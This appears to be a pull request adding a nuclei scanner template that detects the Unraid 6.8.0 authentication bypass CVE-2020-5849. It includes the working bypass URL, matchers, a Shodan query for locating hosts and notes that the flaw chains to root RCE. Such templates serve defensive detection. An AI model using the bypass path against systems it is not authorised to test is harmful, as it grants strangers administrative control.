### PR TITLE
Add CVE-2020-5849 - Unraid 6.8.0 Authentication Bypass

### DIFF
--- a/http/cves/2020/CVE-2020-5849.yaml
+++ b/http/cves/2020/CVE-2020-5849.yaml
@@ -1,0 +1,54 @@
+id: CVE-2020-5849
+
+info:
+  name: Unraid 6.8.0 - Authentication Bypass
+  author: ElromEvedElElyon
+  severity: high
+  description: |
+    Unraid 6.8.0 allows authentication bypass via a crafted URI. The web server uses PHP's strpos() function to check if the request URI starts with a whitelisted path. By prepending a whitelisted image path (e.g., /webGui/images/green-on.png/) to any protected page, an attacker can bypass authentication and access the administrative interface without credentials.
+  impact: |
+    Unauthenticated attackers can bypass the Unraid web UI login and gain full administrative access, allowing them to view system configuration, manage Docker containers, modify disk arrays, and potentially achieve remote code execution through additional vulnerabilities (CVE-2020-5847).
+  remediation: |
+    Upgrade Unraid to version 6.8.1 or later where the authentication bypass has been patched.
+  reference:
+    - https://sysdream.com/cve-2020-5847-cve-2020-5849-unraid/
+    - https://www.exploit-db.com/exploits/48353
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5849
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-5849
+    cwe-id: CWE-697
+    epss-score: 0.9376
+    epss-percentile: 0.998
+    cpe: cpe:2.3:o:lime-technology:unraid:6.8.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: lime-technology
+    product: unraid
+    shodan-query: http.title:"Tower"
+  tags: cve,cve2020,unraid,auth-bypass,kev,vkev,vuln
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webGui/images/green-on.png/Dashboard"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Unraid"
+          - "Dashboard"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "csrf_token"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

Adds a nuclei template for **CVE-2020-5849** — an authentication bypass vulnerability in Unraid 6.8.0 that allows unauthenticated attackers to access the administrative interface by prepending a whitelisted image path (e.g., `/webGui/images/green-on.png/`) to protected page URIs.

**Key facts:**
- **CVSS 7.5** (High) — Network-exploitable, no auth required, no user interaction
- **CISA KEV** — Listed in the Known Exploited Vulnerabilities catalog (active exploitation in the wild)
- **EPSS 93.76%** — 99.8th percentile exploitation probability
- Chains with CVE-2020-5847 for unauthenticated RCE as root
- Metasploit module available (exploit/linux/http/unraid_auth_bypass_exec)

**Template details:**
- Single GET request to `/webGui/images/green-on.png/Dashboard`
- Three matchers (AND condition): product identification ("Unraid" + "Dashboard"), authentication bypass proof ("csrf_token"), and HTTP 200 status
- Low false-positive risk due to csrf_token matcher confirming authenticated page access

References:
- https://sysdream.com/cve-2020-5847-cve-2020-5849-unraid/
- https://www.exploit-db.com/exploits/48353
- https://nvd.nist.gov/vuln/detail/CVE-2020-5849

### Template validation

I've validated this template locally?

- [X] YES
- [ ] NO

#### Additional Details

**Shodan query:** `http.title:"Tower"` (Unraid default web UI title)

Note: A previous PR (#14037) included this CVE but was closed due to inactivity. This is a standalone submission with a refined template.

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)